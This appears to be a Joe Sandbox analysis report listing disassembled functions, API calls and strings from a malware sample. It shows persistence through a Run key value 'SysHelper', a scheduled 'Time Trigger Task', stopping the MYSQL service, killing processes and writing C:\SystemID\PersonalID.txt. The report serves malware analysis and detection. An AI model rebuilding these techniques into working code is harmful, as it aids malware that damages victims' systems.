                                                                                                    • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                                                                                  • _free.LIBCMT ref: 00427B55
                                                                                                  • _free.LIBCMT ref: 00427B73
                                                                                                  • _free.LIBCMT ref: 00427B85
                                                                                                  • _free.LIBCMT ref: 00427B96
                                                                                                  • _free.LIBCMT ref: 00427BA1
                                                                                                  • _free.LIBCMT ref: 00427BC5
                                                                                                  • EncodePointer.KERNEL32(008B5208), ref: 00427BCC
                                                                                                  • _free.LIBCMT ref: 00427BE1
                                                                                                  • _free.LIBCMT ref: 00427BF7
                                                                                                  • _free.LIBCMT ref: 00427C1F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 3064303923-0
                                                                                                  • Opcode ID: ce5aad9df44a4d959ab26dd18bbfc051b559e509faa5c70b1469206ba00ae6fa
                                                                                                  • Instruction ID: d8036121d910c09816430481b6b6363fcbb95216f7cc64832fdbf6810ac9f003
                                                                                                  • Opcode Fuzzy Hash: ce5aad9df44a4d959ab26dd18bbfc051b559e509faa5c70b1469206ba00ae6fa
                                                                                                  • Instruction Fuzzy Hash: C2217535A042748BCB215F56BC80D4A7BA4EB14328B94453FEA14573A1CBF87889DA98
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00411B90 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110stringcomCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CoInitialize.OLE32(00000000), ref: 00411BB0
                                                                                                  • CoCreateInstance.OLE32(004CE908,00000000,00000001,004CD568,00000000), ref: 00411BC8
                                                                                                  • CoUninitialize.OLE32 ref: 00411BD0
                                                                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00411C12
                                                                                                  • SHGetPathFromIDListW.SHELL32(?,?), ref: 00411C22
                                                                                                  • lstrcatW.KERNEL32(?,00500050), ref: 00411C3A
                                                                                                  • lstrcatW.KERNEL32(?), ref: 00411C44
                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00411C68
                                                                                                  • lstrcatW.KERNEL32(?,\shell32.dll), ref: 00411C7A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
                                                                                                  • String ID: \shell32.dll
                                                                                                  • API String ID: 679253221-3783449302
                                                                                                  • Opcode ID: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
                                                                                                  • Instruction ID: 1ac700bd2dba931ae0f93f3cd35093afe8c3aec66b03df765643047a9f16b657
                                                                                                  • Opcode Fuzzy Hash: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
                                                                                                  • Instruction Fuzzy Hash: 1D415E70A40209AFDB10CBA4DC88FEA7B7CEF44705F104499F609D7160D6B4AA45CB54
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004549A0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 107libraryloaderCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
                                                                                                  • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                                                                                                  • GetDesktopWindow.USER32 ref: 004549FB
                                                                                                  • GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                                                                                                  • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                                                                                                  • GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                                                                                                  • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                                                                                                  • _wcsstr.LIBCMT ref: 00454A8A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                  • String ID: Service-0x$_OPENSSL_isservice
                                                                                                  • API String ID: 2112994598-1672312481
                                                                                                  • Opcode ID: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
                                                                                                  • Instruction ID: a4b3c478c226dd270820e71b951499fe23bca8177d071b610c32d3665965eb2a
                                                                                                  • Opcode Fuzzy Hash: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
                                                                                                  • Instruction Fuzzy Hash: 04312831A401049BCB10DBBAEC46AAE7778DFC4325F10426BFC19D72E1EB349D148B58
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00454AE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 75registrywindowCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetStdHandle.KERNEL32(000000F4,00454C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0045480E,.\crypto\cryptlib.c,00000253,pointer != NULL,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454AFA
                                                                                                  • GetFileType.KERNEL32(00000000,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454B05
                                                                                                  • __vfwprintf_p.LIBCMT ref: 00454B27
                                                                                                    • Part of subcall function 0042BDCC: _vfprintf_helper.LIBCMT ref: 0042BDDF
                                                                                                  • vswprintf.LIBCMT ref: 00454B5D
                                                                                                  • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00454B7E
                                                                                                  • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00454BA2
                                                                                                  • DeregisterEventSource.ADVAPI32(00000000), ref: 00454BA9
                                                                                                  • MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 00454BD3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                                                                                                  • String ID: OPENSSL$OpenSSL: FATAL
                                                                                                  • API String ID: 277090408-1348657634
                                                                                                  • Opcode ID: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
                                                                                                  • Instruction ID: 2d266f03b07cc91b1361f4b715b0612335af4cc100d4b249efeb6d9ab3704f8b
                                                                                                  • Opcode Fuzzy Hash: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
                                                                                                  • Instruction Fuzzy Hash: 74210D716443006BD770A761DC47FEF77D8EF94704F80482EF699861D1EAB89444875B
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00412360 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 61registrystringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00412389
                                                                                                  • _memset.LIBCMT ref: 004123B6
                                                                                                  • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004123DE
                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004123E7
                                                                                                  • GetCommandLineW.KERNEL32 ref: 004123F4
                                                                                                  • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004123FF
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 0041240E
                                                                                                  • lstrcmpW.KERNEL32(?,?), ref: 00412422
                                                                                                  Strings
                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0041237F
                                                                                                  • SysHelper, xrefs: 004123D6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                                                                                                  • API String ID: 122392481-4165002228
                                                                                                  • Opcode ID: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
                                                                                                  • Instruction ID: c603cf62551caa9c06587f3e6ced3ee16b2371f56cdaae2afb18e0be874d4686
                                                                                                  • Opcode Fuzzy Hash: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
                                                                                                  • Instruction Fuzzy Hash: D7112C7194020DABDF50DFA0DC89FEE77BCBB04705F0445A5F509E2151DBB45A889F94
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00418000 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 344COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memmove
                                                                                                  • String ID: invalid string position$string too long
                                                                                                  • API String ID: 4104443479-4289949731
                                                                                                  • Opcode ID: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
                                                                                                  • Instruction ID: bf4c3c4c16418921af35957e8a842e40232b78bc4dd53ff6fdc572851f10e90f
                                                                                                  • Opcode Fuzzy Hash: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
                                                                                                  • Instruction Fuzzy Hash: 4AC19F71700209EFDB18CF48C9819EE77A6EF85704B24492EE891CB741DB34ED968B99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040DAC0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 160comstringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CoInitialize.OLE32(00000000), ref: 0040DAEB
                                                                                                  • CoCreateInstance.OLE32(004D4F6C,00000000,00000001,004D4F3C,?,?,004CA948,000000FF), ref: 0040DB0B
                                                                                                  • lstrcpyW.KERNEL32(?,?), ref: 0040DBD6
                                                                                                  • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,004CA948,000000FF), ref: 0040DBE3
                                                                                                  • _memset.LIBCMT ref: 0040DC38
                                                                                                  • CoUninitialize.OLE32 ref: 0040DC92
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
                                                                                                  • String ID: --Task$Comment$Time Trigger Task
                                                                                                  • API String ID: 330603062-1376107329
                                                                                                  • Opcode ID: 4f76096c1bb55b8fd6772bfaf79823c9e02c83c8f45e810a8838bdd484e9cb7f
                                                                                                  • Instruction ID: 3ca8ca325a9fd4b6db29fab4a8cd6851ae340f1496bb62272076f21ffc706129
                                                                                                  • Opcode Fuzzy Hash: 4f76096c1bb55b8fd6772bfaf79823c9e02c83c8f45e810a8838bdd484e9cb7f
                                                                                                  • Instruction Fuzzy Hash: E051F670A40209AFDB00DF94CC99FAE7BB9FF88705F208469F505AB2A0DB75A945CF54
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00411A10 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 63servicesleepCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00411A1D
                                                                                                  • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00411A32
                                                                                                  • ControlService.ADVAPI32(00000000,00000001,?), ref: 00411A46
                                                                                                  • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A5B
                                                                                                  • Sleep.KERNEL32(?), ref: 00411A75
                                                                                                  • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A80
                                                                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 00411A9E
                                                                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 00411AA1
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                                                                                                  • String ID: MYSQL
                                                                                                  • API String ID: 2359367111-1651825290
                                                                                                  • Opcode ID: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
                                                                                                  • Instruction ID: 28721974f2ef8f77e49d09c1c1511d7c7b7ffc9f5d452c27f8aea73f5df61dea
                                                                                                  • Opcode Fuzzy Hash: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
                                                                                                  • Instruction Fuzzy Hash: 7F117735A01209ABDB209BD59D88FEF7FACEF45791F040122FB08D2250D728D985CAA8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0044F26C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • std::exception::exception.LIBCMT ref: 0044F27F
                                                                                                    • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0044F294
                                                                                                    • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                  • std::exception::exception.LIBCMT ref: 0044F2AD
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0044F2C2
                                                                                                  • std::regex_error::regex_error.LIBCPMT ref: 0044F2D4
                                                                                                    • Part of subcall function 0044EF74: std::exception::exception.LIBCMT ref: 0044EF8E
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0044F2E2
                                                                                                  • std::exception::exception.LIBCMT ref: 0044F2FB
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0044F310
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                                                                                                  • String ID: bad function call
                                                                                                  • API String ID: 2464034642-3612616537
                                                                                                  • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                  • Instruction ID: b7a33952e270e61bb8336860f47bfa26d0287e47148adb1a9e07c7a629f44a3a
                                                                                                  • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                  • Instruction Fuzzy Hash: 60110A74D0020DBBCB04FFA5D566CDDBB7CEA04348F408A67BD2497241EB78A7498B99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00465480 Relevance: 15.2, APIs: 7, Strings: 3, Instructions: 172COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 004654C8
                                                                                                  • GetLastError.KERNEL32(?,?,00000000), ref: 004654D4
                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 004654F7
                                                                                                  • GetLastError.KERNEL32(?,?,00000000), ref: 00465503
                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00465531
                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 0046555B
                                                                                                  • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 004655F5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                                                                  • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                                                                                                  • API String ID: 1717984340-2085858615
                                                                                                  • Opcode ID: 5bed85aa8c1b563afb7458887addcfa84ee938cd819de717f6d53dc9ad9ea7b7
                                                                                                  • Instruction ID: 21cfcf061b86b0f752f7d9b12bec731e5652c25b667fcf3b1ac9b742683446ef
                                                                                                  • Opcode Fuzzy Hash: 5bed85aa8c1b563afb7458887addcfa84ee938cd819de717f6d53dc9ad9ea7b7
                                                                                                  • Instruction Fuzzy Hash: 5A518E71B40704BBEB206B61DC47FBF7769AF05715F40012BFD05BA2C1E669490186AB
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00425B6E Relevance: 15.1, APIs: 10, Instructions: 131COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock
                                                                                                  • String ID:
                                                                                                  • API String ID: 790675137-0
                                                                                                  • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                                                                                  • Instruction ID: 0fe30f67420a0b57e0336c9221d2143c2ac41a82f10de3dc78134a272e9def7d
                                                                                                  • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                                                                                  • Instruction Fuzzy Hash: BE412932700724AFDB11AFA6B886B9E7BE0EF44318F90802FF51496282DB7D9544DB1D
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040C740 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 254COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00420FDD: __wfsopen.LIBCMT ref: 00420FE8
                                                                                                  • _fgetws.LIBCMT ref: 0040C7BC
                                                                                                  • _memmove.LIBCMT ref: 0040C89F
                                                                                                  • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateDirectory__wfsopen_fgetws_memmove
                                                                                                  • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                  • API String ID: 2864494435-54166481
                                                                                                  • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                                  • Instruction ID: 3a80d152ee3a33a632d987be3a831cd6f981e29f6d1810208bb328cacc5ceb60
                                                                                                  • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                                  • Instruction Fuzzy Hash: 449193B2E00219DBCF20DFA5D9857AFB7B5AF04304F54463BE805B3281E7799A44CB99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00412440 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52processCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0041244F
                                                                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412469
                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004124A1
                                                                                                  • TerminateProcess.KERNEL32(00000000,00000009), ref: 004124B0
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004124B7
                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 004124C1
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004124CD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                  • String ID: cmd.exe
                                                                                                  • API String ID: 2696918072-723907552
                                                                                                  • Opcode ID: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
                                                                                                  • Instruction ID: b239e8364e8e77cb7af63d5752a1eab109cf3eb7ce5fcb3b526656d556a9da04
                                                                                                  • Opcode Fuzzy Hash: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
                                                                                                  • Instruction Fuzzy Hash: ED0192355012157BE7206BA1AC89FAF766CEB08714F0400A2FD08D2141EA6489408EB9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040F310 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 311libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • LoadLibraryW.KERNEL32(Shell32.dll), ref: 0040F338
                                                                                                  • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0040F353
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                  • String ID: SHGetFolderPathW$Shell32.dll$\
                                                                                                  • API String ID: 2574300362-2555811374
                                                                                                  • Opcode ID: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
                                                                                                  • Instruction ID: 879cb2c41796572bb27552663435674e3d239ec9c812fe4031d18dca963833e9
                                                                                                  • Opcode Fuzzy Hash: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
                                                                                                  • Instruction Fuzzy Hash: DFC15A70D00209EBDF10DFA4DD85BDEBBB5AF14308F10443AE405B7291EB79AA59CB99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040CBA0 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 240COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
